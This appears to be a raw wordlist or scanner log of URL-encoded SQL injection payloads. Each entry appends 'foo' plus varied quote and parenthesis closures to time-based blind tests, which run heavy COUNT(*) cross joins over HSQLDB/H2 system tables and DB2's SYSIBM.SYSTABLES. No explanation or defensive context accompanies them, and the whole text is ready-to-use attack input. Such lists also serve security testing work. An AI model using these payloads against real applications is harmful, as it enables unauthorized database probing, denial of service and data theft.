foo%22%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 foo%29%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%284488%3D4488 foo%29%29%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%282396%3D2396 foo%29%29%29%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%281529%3D1529 foo%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 foo%27%29%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27OWbi%27%3D%27OWbi foo%27%29%29%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%27amCV%27%3D%27amCV foo%27%29%29%29%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%27cswO%27%3D%27cswO foo%27%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%27JtfB%27%3D%27JtfB foo%27%29%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27NVwB%27%20LIKE%20%27NVwB foo%27%29%29%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%27eick%27%20LIKE%20%27eick foo%27%29%29%29%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%27aSDf%27%20LIKE%20%27aSDf foo%27%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%27GmZU%27%20LIKE%20%27GmZU foo%22%29%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%22vGAe%22%3D%22vGAe foo%22%29%29%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%22xFFI%22%3D%22xFFI foo%22%29%29%29%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%22iwdQ%22%3D%22iwdQ foo%22%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%22rZNh%22%3D%22rZNh foo%22%29%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%22PPUB%22%20LIKE%20%22PPUB foo%22%29%29%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%22iDeH%22%20LIKE%20%22iDeH foo%22%29%29%29%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%22WrsU%22%20LIKE%20%22WrsU foo%22%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%22bYse%22%20LIKE%20%22bYse foo%29%20WHERE%203987%3D3987%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 foo%27%29%20WHERE%205919%3D5919%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 foo%27%20WHERE%201353%3D1353%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 foo%22%20WHERE%203937%3D3937%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 foo%27%20%7C%7C%20%28SELECT%203950%20FROM%20DUAL%20WHERE%202935%3D2935%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%204889%20WHERE%208821%3D8821%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%206242%20FROM%20DUAL%20WHERE%203067%3D3067%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20%29 foo%20%2B%20%28SELECT%209941%20WHERE%202497%3D2497%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20%29 foo%27%20%2B%20%28SELECT%20%27qoKK%27%20FROM%20DUAL%20WHERE%203791%3D3791%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27IRia%27%20WHERE%207986%3D7986%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20%23 foo%29%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29-- foo%27%29%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29-- foo%27%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29-- foo%22%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29-- foo%29%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%288937%3D8937 foo%29%29%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%282352%3D2352 foo%29%29%29%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%28%281327%3D1327 foo%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29-- foo%27%29%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%27tyXI%27%3D%27tyXI foo%27%29%29%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%28%27SukU%27%3D%27SukU foo%27%29%29%29%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%28%28%27NFTM%27%3D%27NFTM foo%27%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%27qDyK%27%3D%27qDyK foo%27%29%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%27Ievd%27%20LIKE%20%27Ievd foo%27%29%29%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%28%27Kgzp%27%20LIKE%20%27Kgzp foo%27%29%29%29%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%28%28%27PbJz%27%20LIKE%20%27PbJz foo%27%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%27PzpR%27%20LIKE%20%27PzpR foo%22%29%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%22KjUI%22%3D%22KjUI foo%22%29%29%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%28%22ErVZ%22%3D%22ErVZ foo%22%29%29%29%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%28%28%22xUDt%22%3D%22xUDt foo%22%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%22zXhI%22%3D%22zXhI foo%22%29%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%22bGdY%22%20LIKE%20%22bGdY foo%22%29%29%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%28%22ynhU%22%20LIKE%20%22ynhU foo%22%29%29%29%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%28%28%22GdTG%22%20LIKE%20%22GdTG foo%22%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%22qazE%22%20LIKE%20%22qazE foo%29%20WHERE%209163%3D9163%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29-- foo%27%29%20WHERE%204410%3D4410%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29-- foo%27%20WHERE%209103%3D9103%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29-- foo%22%20WHERE%206315%3D6315%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29-- foo%27%20%7C%7C%20%28SELECT%209220%20FROM%20DUAL%20WHERE%209513%3D9513%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%201492%20WHERE%204135%3D4135%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%205429%20FROM%20DUAL%20WHERE%209582%3D9582%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20%29 foo%20%2B%20%28SELECT%208783%20WHERE%209860%3D9860%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20%29 foo%27%20%2B%20%28SELECT%20%27iNOx%27%20FROM%20DUAL%20WHERE%206641%3D6641%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27uAkA%27%20WHERE%209057%3D9057%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%201609%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20%23 foo%29%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 foo%27%29%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 foo%27%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 foo%22%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 foo%29%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%289591%3D9591 foo%29%29%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%281500%3D1500 foo%29%29%29%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%281965%3D1965 foo%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 foo%27%29%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27rAot%27%3D%27rAot foo%27%29%29%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%27CZCV%27%3D%27CZCV foo%27%29%29%29%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%27AnqH%27%3D%27AnqH foo%27%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27WlAb%27%3D%27WlAb foo%27%29%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27jPXW%27%20LIKE%20%27jPXW foo%27%29%29%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%27ziAt%27%20LIKE%20%27ziAt foo%27%29%29%29%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%27gHGb%27%20LIKE%20%27gHGb foo%27%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27ijmF%27%20LIKE%20%27ijmF foo%22%29%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%22hSwa%22%3D%22hSwa foo%22%29%29%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%22EcmR%22%3D%22EcmR foo%22%29%29%29%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%22czOg%22%3D%22czOg foo%22%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%22ACqK%22%3D%22ACqK foo%22%29%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%22Qidy%22%20LIKE%20%22Qidy foo%22%29%29%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%22iKyo%22%20LIKE%20%22iKyo foo%22%29%29%29%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%22bXpS%22%20LIKE%20%22bXpS foo%22%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%22qOnb%22%20LIKE%20%22qOnb foo%29%20WHERE%206685%3D6685%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 foo%27%29%20WHERE%202439%3D2439%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 foo%27%20WHERE%207505%3D7505%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 foo%22%20WHERE%203328%3D3328%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 foo%27%20%7C%7C%20%28SELECT%203103%20FROM%20DUAL%20WHERE%206528%3D6528%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%208062%20WHERE%209237%3D9237%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%206789%20FROM%20DUAL%20WHERE%209299%3D9299%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29 foo%20%2B%20%28SELECT%204183%20WHERE%206988%3D6988%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29 foo%27%20%2B%20%28SELECT%20%27fWff%27%20FROM%20DUAL%20WHERE%206340%3D6340%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27ScXi%27%20WHERE%204807%3D4807%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%209406%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%23 foo%29%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%27%29%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%27%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%22%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 